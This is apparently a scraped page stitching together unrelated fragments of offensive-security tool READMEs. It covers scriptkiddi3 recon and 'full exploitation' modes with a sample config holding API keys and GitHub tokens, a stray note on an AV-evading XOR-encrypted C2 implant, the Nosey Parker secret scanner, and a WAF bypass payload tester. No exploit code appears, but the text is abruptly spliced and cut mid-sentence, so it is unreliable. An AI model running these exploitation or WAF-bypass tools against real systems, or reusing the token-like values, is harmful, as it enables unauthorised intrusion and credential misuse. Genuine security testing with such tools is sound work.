[UPDATE:] -u, --update to update tool
[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com
Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE
scriptkiddi3 -m EXP -d target.com
FULL EXPLOITATION MODE contains following functions
Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE
scriptkiddi3 -m SUB -d target.com
SUBDOMAIN ENUMERATION MODE contains following functions
Run scriptkiddi3 in URL ENUMERATION MODE
scriptkiddi3 -m URL -d target.com
URL ENUMERATION MODE contains following functions
Using your own CONFIG File for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
You can also provie your own CONDIF file with your API Keys for subdomain enumeration with subfinder
Updating tool to latest version You can run following command to update tool
scriptkiddi3 -u
An Example of config.yaml
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password
If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.
If you have any other queries, you can always contact me on Twitter(thecyberneh)
I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.
ο«[Disclaimer]: Use of this project is for Educational/ Testing purposes only. Using it on unauthorised machines is strictly forbidden. If somebody is found to use it for illegal/ malicious intent, author of the repo will not be held responsible.
Β
Install PRAW library in python3:
pip3 install praw
See the Quickstart guide on how to get going right away!
Below is a demonstration of the XOR-encrypted C2 traffic for understanding purposes:
Since it is a custom C2 Implant, it doesn't get detected by any AV as the bevahiour is completely legit.
Special thanks to @T4TCH3R for working with me and contributing to this project.
Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data. It is useful both for offensive and defensive security testing.
Key features:
This open-source version of Nosey Parker is a reimplementation of the internal version that is regularly used in offensive security engagements at Praetorian. The internal version has additional capabilities for false positive suppression and an alternative machine learning-based detection engine. Read more in blog posts here and here.
1. (On x86_64) Install the Hyperscan library and headers for your system
On macOS using Homebrew:
brew install hyperscan pkg-config
On Ubuntu 22.04:
apt install libhyperscan-dev pkg-config
1. (On non-x86_64) Build Vectorscan from source
You will need several dependencies, including cmake
, boost
, ragel
, and pkg-config
.
Download and extract the source for the 5.4.8 release of Vectorscan:
wget https://github.com/VectorCamp/vectorscan/archive/refs/tags/vectorscan/5.4.8.tar.gz && tar xfz 5.4.8.tar.gz
Build with cmake:
cd vectorscan-vectorscan-5.4.8 && cmake -B build -DCMAKE_BUILD_TYPE=Release . && cmake --build build
Set the HYPERSCAN_ROOT
environment variable so that Nosey Parker builds against your from-source build of Vectorscan:
export HYPERSCAN_ROOT="$PWD/build"
Note: The Nosey Parker Dockerfile
builds Vectorscan from source and links against that.
2. Install the Rust toolchain
Recommended approach: install from https://rustup.rs
3. Build using Cargo
cargo build --release
This will produce a binary at target/release/noseyparker
.
A prebuilt Docker image is available for the latest release for x86_64:
docker pull ghcr.io/praetorian-inc/noseyparker:latest
A prebuilt Docker image is available for the most recent commit for x86_64:
docker pull ghcr.io/praetorian-inc/noseyparker:edge
For other architectures (e.g., ARM) you will need to build the Docker image yourself:
docker build -t noseyparker .
Run the Docker image with a mounted volume:
docker run -v "$PWD":/opt/ noseyparker
Note: The Docker image runs noticeably slower than a native binary, particularly on macOS.
Most Nosey Parker commands use a datastore. This is a special directory that Nosey Parker uses to record its findings and maintain its internal state. A datastore will be implicitly created by the scan
command if needed. You can also create a datastore explicitly using the datastore init -d PATH
command.
Nosey Parker has built-in support for scanning files, recursively scanning directories, and scanning the entire history of Git repositories.
For example, if you have a Git clone of CPython locally at cpython.git
, you can scan its entire history with the scan
command. Nosey Parker will create a new datastore at np.cpython
and saves its findings there.
$ noseyparker scan --datastore np.cpython cpython.git
Found 28.30 GiB from 18 plain files and 427,712 blobs from 1 Git repos [00:00:04]
Scanning content ββββββββββββββββββββ 100% 28.30 GiB/28.30 GiB [00:00:53]
Scanned 28.30 GiB from 427,730 blobs in 54 seconds (538.46 MiB/s); 4,904/4,904 new matches
Rule Distinct Groups Total Matches
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
PEM-Encoded Private Key 1,076 1,1 92
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2
Run the `report` command next to show finding details.
Nosey Parker can also scan Git repos that have not already been cloned to the local filesystem. The --git-url URL
, --github-user NAME
, and --github-org NAME
options to scan
allow you to specify repositories of interest.
For example, to scan the Nosey Parker repo itself:
$ noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker
For example, to scan accessible repositories belonging to octocat
:
$ noseyparker scan --datastore np.noseyparker --github-user octocat
These input specifiers will use an optional GitHub token if available in the NP_GITHUB_TOKEN
environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.
See noseyparker help scan
for more details.
Nosey Parker prints out a summary of its findings when it finishes scanning. You can also run this step separately:
$ noseyparker summarize --datastore np.cpython
Rule Distinct Groups Total Matches
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
PEM-Encoded Private Key 1,076 1,192
Generic Secret 331 478
netrc Credentials 42 3,201
Generic API Key 2 31
md5crypt Hash 1 2
Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT
option.
To see details of Nosey Parker's findings, use the report
command. This prints out a text-based report designed for human consumption:
--format=FORMAT
option. To list URLs for repositories belonging to GitHub users or organizations, use the github repos list
command. This command uses the GitHub REST API to enumerate repositories belonging to one or more users or organizations. For example:
$ noseyparker github repos list --user octocat
https://github.com/octocat/Hello-World.git
https://github.com/octocat/Spoon-Knife.git
https://github.com/octocat/boysenberry-repo-1.git
https://github.com/octocat/git-consortium.git
https://github.com/octocat/hello-worId.git
https://github.com/octocat/linguist.git
https://github.com/octocat/octocat.github.io.git
https://github.com/octocat/test-repo1.git
An optional GitHub Personal Access Token can be provided via the NP_GITHUB_TOKEN
environment variable. Providing an access token gives a higher API rate limit and may make additional repositories accessible to you.
Additional output formats are supported, including JSON and JSON lines, via the --format=FORMAT
option.
See noseyparker help github
for more details.
Running the noseyparker
binary without arguments prints top-level help and exits. You can get abbreviated help for a particular command by running noseyparker COMMAND -h
.
Tip: More detailed help is available with the help
command or long-form --help
option.
Contributions are welcome, particularly new regex rules. Developing new regex rules is detailed in a separate document.
If you are considering making significant code changes, please open an issue first to start discussion.
Nosey Parker is licensed under the Apache License, Version 2.0.
Any contribution intentionally submitted for inclusion in Nosey Parker by you, as defined in the Apache 2.0 license, shall be licensed as above, without any additional terms or conditions.
WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
It is forbidden to use for illegal and illegal purposes. Don't break the law. We are not responsible for possible risks associated with the use of this software.
The latest waf-bypass always available via the Docker Hub. It can be easily pulled via the following command:
# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'
# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'
'--proxy'
(--proxy='http://proxy.example.com:3128'
) - option allows to specify where to connect to instead of the host.
'--header'
(--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF'
) - option allows to specify the HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.
'--user-agent'
(--user-agent 'MyUserAgent 1/1'
) - option allows to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT"
).
'--block-code'
(--block-code='403' --block-code='222'
) - option allows you to specify the HTTP status code to expect when the WAF is blocked. (default is 403
). Multiple use is allowed.
'--threads'
(--threads=15
) - option allows to specify the number of parallel scan threads (default is 10
).
'--timeout'
(--timeout=10
) - option allows to specify a request processing timeout in sec. (default is 30
).
'--json-format'
- an option that allows you to display the result of the work in JSON format (useful for integrating the tool with security platforms).
'--details'
- display the False Positive and False Negative payloads. Not available in JSON
format.
'--exclude-dir'
- exclude the payload's directory (--exclude-dir='SQLi' --exclude-dir='XSS'
). Multiple use is allowed.
Depending on the purpose, payloads are located in the appropriate folders:
When compiling a payload, the following zones, method and options are used:
Base64
, HTML-ENTITY
, UTF-16
) in addition to the encoding for the payload. Multiple values are indicated with a space (e.g. Base64 UTF-16
). Applicable only to for ARGS
, BODY
, COOKIE
and HEADER
zone. Not applicable to payloads in API and MFD directories. Not compatible with option JSON
.Except for some cases described below, the zones are independent of each other and are tested separately (those if 2 zones are specified - the script will send 2 requests - alternately checking one and the second zone).
For the zones you can use %RND%
suffix, which allows you to generate an arbitrary string of 6 letters and numbers. (e.g.: param%RND=my_payload
or param=%RND%
OR A%RND%B
)
You can create your own payloads, to do this, create your own folder on the '/payload/' folder, or place the payload in an existing one (e.g.: '/payload/XSS'). Allowed data format is JSON.
API testing payloads located in this directory are automatically appended with a header 'Content-Type: application/json'
.
For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY
(required) and BOUNDARY
(optional). If BOUNDARY
is not set, it will be generated automatically (in this case, only the payload must be specified for the BODY, without additional data ('... Content-Disposition: form-data; ...'
).
If a BOUNDARY
is specified, then the content of the BODY
must be formatted in accordance with the RFC, but this allows for multiple payloads in BODY
a separated by BOUNDARY
.
Other zones are allowed in this directory (e.g.: URL
, ARGS
etc.). Regardless of the zone, header 'Content-Type: multipart/form-data; boundary=...'
will be added to all requests.
he changelog summary since the 2022.4 release from December: